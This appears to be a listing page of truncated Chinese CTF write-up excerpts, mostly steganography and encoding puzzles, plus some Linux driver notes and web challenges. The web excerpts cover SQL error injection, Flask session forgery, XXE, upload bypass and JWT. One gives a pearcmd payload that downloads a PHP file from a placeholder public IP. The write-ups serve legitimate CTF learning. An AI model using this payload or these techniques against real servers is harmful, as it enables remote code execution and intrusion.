misc ctfshow buuctf

一段.flac音频，提示隐写 下载audacity软件，打开 wp2 发现左声道是摩斯电码，这里给出一个大佬们用的摩斯电码音频解码工具 导出为MP3或者wav格式，开始解密 （使用audacity生成单声道音频）（静音+删除右耳声道+左耳导出为mp3格式） upload后play ......

右键链接另存保存图片，放入winhex 点击中显示“图像存在错误无法显示”，大概是有数据错了需要修改，导致打不开图片 查看后，参考博客，发现png文件署名域有误 改为89，保存，flag出现 ......

【隐写工具】【试一试？】jphide seek（JPHS） 使用方法,检测提示 放进JPHS，无密码seek保存为.txt格式 文件头有点像png，将后缀改为.png出现二维码，手机扫码跳转到CTFSHOW登录页面 【捂脸】看了眼wp，所以说找个QR解析工具看URL，得到： https://ctf. ......

小明的压缩包又忘记密码了？他去电脑维修店去修，人家扔出来说这个根本就没有密码，是个假密码。小明懵了，明明有密码的啊，你能帮帮小明吗？ 伪加密，放入winhex 一个 zip 文件由三个部分组成：压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 ......

QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg== 比base64还大的base 比base64还大的base有base85,base91,base92等 后面有两个等于号，是base64的形式 （当最后剩余两个八位(待补足)字节（2个byte）时，最后一个6位的Bas ......

图片这么好看，但是没啥用呦 图片隐写 图片隐写的解题思路汇总 解压后的word放进 010editor ......

文件的主人喜欢用生日做密码，而且还是个90后 ARCHPR ......

题目名称：我想吃培根 题目描述： -- .-. ... . ..--.- .. ... ..--.- -.-. .-.. ..--.- -... ..- - ..--.- -... .- -.-. -. ..--.- .. ... ..--.- -.-. .-.. . .-. ..--.- -- - ......

栅栏密码 密文： 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式：KEY{XXXXXXXXXXXXXX} 十六进制，想到 bas ......

 根据提示LSB BGR 方式去获取图片中的隐藏信息 使用工具StegSolve ![images](h ......

``` 其实这一题灵感是来自于b站一个puzzle up主的一个投稿，就叫重叠拼图，就是两块拼图之间有大量的重叠部分。我按照原理，参考了机气人师傅和狸师傅的代码，写了这个算法，把底图加flag后分成20x20像素的方块，然后每个方块找一个随机点作为圆心将图片旋转随机角度，然后以圆心为中心截取一个80 ......

打开文件，选择不同发送包可以看到数据部分的前几位在变换，将这两位复制出来拼接即可得到flag。  ......

 刚结束的ciscn，里面的要是有这么简单就好了。 下载附件，是个pcap文件，打开wireshark ......

 这题是自己独立完成的！！！ 首先下载附件！！！ 解压缩发现是个docx文档，wps提示可以修复，但是 ......

 下载下来的附件！打开都是1和0的组合！ ![images](https://img2023.cnbl ......

 有点意思的题目，看了一下评论区。 有了解题思路。 首先解压附件，可以得到一张照片。 ![images ......

 这个题目对于菜鸡来说真的有点难呐。。 总结一下： 左： 图片分离，可以看到图片里有rar文件； hi ......

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload： http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php： `"; ?>` 上传成功后显示： ``` do ......

## 判断过滤哪些关键词和字符 ## 报错注入 报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这里主要记录一下`xpath语法错误`和`concat+rand()+group_by ......

## 寻找破解知识点 ## 方法1 - Flask session伪造 首先，先注册一个再登录，在change password那里查看源码，可以看到有提示： ![](https://img2023.cnblogs.com/blog/2539847/202308/2539847-2023082820 ......

1. 判断传参方式，输入`1' or 1 = 1`，URL传参，所以是`get`。 报错```error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB se ......

小提示：需要从图片上提取flag文字，可以通过截图翻译或者微信发送图片，这两个的ai图像识别挺好用的。 misc1： 解压打开就能看见flag，提取出来就行 misc2： 记事本打开，看见 ng字符，尝试更改后缀为.png，重新打开看见flag misc3： 题目为bpg文件，使用一些看图软件可以打 ......

https://gitee.com/mirrors/Linux/blob/v6.4/include/linux/miscdevice.h 79行 结构体 miscdevice struct miscdevice { int minor; const char *name; const struct ......

一、题目链接 https://ctf.bugku.com/challenges/detail/id/87.html?id=87& 二、解法步骤 打开网页，发现自动给url上了参数：， line的值为空，filename是base64加密格式，解密后为：key.txt。 首先尝试更改line=1,、2 ......

#1 引入misc device ## 1.1传统cdev方式 char_drv.c ``` #include #include #include #include #include #include #include #include #include #include #include stat ......

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截，右键查看源代码和f12均失效,两种方 ......

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹， ......

# ctfshow--web入门--XXE ## web373 源码 ```php loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //解析xml文档 $creds = simplexml_import_dom($dom); $ctfshow = ......

# ctfshow--web入门--文件上传 ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过  检查前端代码进 ......

## jwt介绍 对json格式的信息采取的一种编码 JWT：Json web token 由两个点分隔成三个部分，分别为: - Header - Payload - Signature： 如果在Header部分声明的签名算法为HS256，以及服务器约定使用的密钥为secret 那么签名使用的算法一 ......